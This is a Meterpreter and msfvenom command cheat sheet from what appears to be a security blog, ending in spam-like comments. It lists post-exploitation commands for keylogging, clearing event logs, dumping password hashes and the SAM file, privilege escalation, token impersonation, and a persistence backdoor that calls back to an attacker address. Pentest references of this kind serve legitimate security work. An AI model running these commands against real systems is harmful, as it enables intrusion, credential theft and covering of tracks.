by 
What is Metasploit?
Metasploit is the world’s leading open-source penetrating framework used by security engineers as a penetration testing system and a development platform that allows to create security tools and exploits. The framework makes hacking simple for both attackers and defenders.
Meterpreter commands-
Basic and file handling commands
| sysinfo | Display system in formation |
| ps | List and display running processes |
| kill (PID) | Terminate a running process |
| getuid | Display user ID |
| upload or download | Upload / download a file |
| pwd or lpwd | Print working directory ( local / remote) |
| cd or lcd | Change directory ( local or remote) |
| cat | Display file content |
| bglist | show background running scripts |
| bgrun | make a script run in the background |
| bgkill | terminate a background process |
| background | Move active session to background |
| edit <FILE Name> | Edit a file in vi editor |
| shell | Access shell on the target machine |
| migrate <PID> | Switch to another process |
| idletime | Display idle time of user |
| screenshot | Take a screenshot |
| clearev | Clear the system logs |
| ? or Help | Help showing all the commands |
| exit / quit : | Exit the Meterpreter session |
| shutdown / reboot | Restart the system |
| use | Extension load |
| channel | Show active channels |
Process handling commands
| Command | Description |
| getpid: | Display the process ID |
| getuid: | Display the user ID |
| ps: | Display running process |
| Kill: | Stop and terminate a process |
| getprivs | Shows multiple privileges as possible |
| reg | Access target machine registry |
| Shell | Access target machine shell |
| execute: | Run a specified |
| migrate: | Move to a given destination process ID |
Interface / output commands
| enumdesktops | Show all available desktops |
| Getdesktop | Display current desktop |
| keyscan_ start | Start keylogger in target machine |
| Keyscan_ stop | Stop keylogger in target machine |
| set _desktop | Configure desktop |
| keyscan_dump | Dump keylogger content |
Password management commands
| hashdump | Access content of password file – Hash file |
Msfvenom command options
| Switch | Syntax | Description |
| -p | – p (Payload option) | Display payload standard options |
| – l | – l ( list type) | List module type i .e payload, encoders |
| – f | – f ( format ) | output format |
| – e | -e (encoder) | Define which encoder to use |
| -a | – a (Architecture or platform | Define which platform to use |
| -s | -s (Space) | Define maximum payload capacity |
| -b | -b (characters) | Define set of characters not to use |
| – i | – i (Number of times) | Define number of times to use encoder |
| -x | -x (File name) | Define a custom file to use as template |
| – o | -o (output) | Save a payload |
| – h | -h | Help |
Example-
Meterpreter upload file to Windows target:
meterpreter> upload file c:\\windowsMeterpreter download file from Windows target:
meterpreter> download c:\\windows\\repair\\sam /tmpMeterpreter run .exe on target – handy for executing uploaded exploits:
meterpreter> execute -f c:\\windows\\temp\\exploit.exeCreates new channel with cmd shell:
meterpreter> execute -f cmd -cMeterpreter show processes:
meterpreter> psMeterpreter get shell on the target:
meterpreter> shellMeterpreter attempts priviledge escalation the target:
meterpreter> getsystemMeterpreter attempts to dump the hashes on the target:
meterpreter> hashdumpmeterpreter> credcollectMeterpreter create port forward to target machine:
meterpreter> portfwd add –l 3389 –p 3389 –r $IPMeterpreter delete port forward:
meterpreter> portfwd delete –l 3389 –p 3389 –r $IPSearch excel files on target machine:
meterpreter> search -f *.xlsxGet user id:
meterpreter> getuidCheck whether arch == meterpreter or migrate to x64 process!!
meterpreter> sysinfoIdentify other machines that the supplied domain user has administrative access to
msf> run post/windows/gather/local_admin_search_enummsf> connect $TARGET $PORTUses SSL:
msf> connect -s $TARGET $PORTStarts ruby shell:
msf> irbIntegrations with other tools:
msf> load pcap, wmap, nessusmsf> db_hostsmsf> db_vulnsmsf> db_exploitedMeterpreter persistence mode
meterpreter> run persistence -U -i 5 -p 443 -r $IPImpersonate any user
meterpreter> use incognitometerpreter> list_tokens -umeterpreter> impersonate_token MACHINE\\usermeterpreter> drop_token
I like what you guys are up too. Such smart work and reporting! Carry on the superb works guys I抳e incorporated you guys to my blogroll. I think it’ll improve the value of my site 🙂
It is the best time to make some plans for the future and it is time to be happy. I’ve read this post and if I could I want to suggest you some interesting things or advice. Maybe you can write next articles referring to this article. I wish to read more things about it!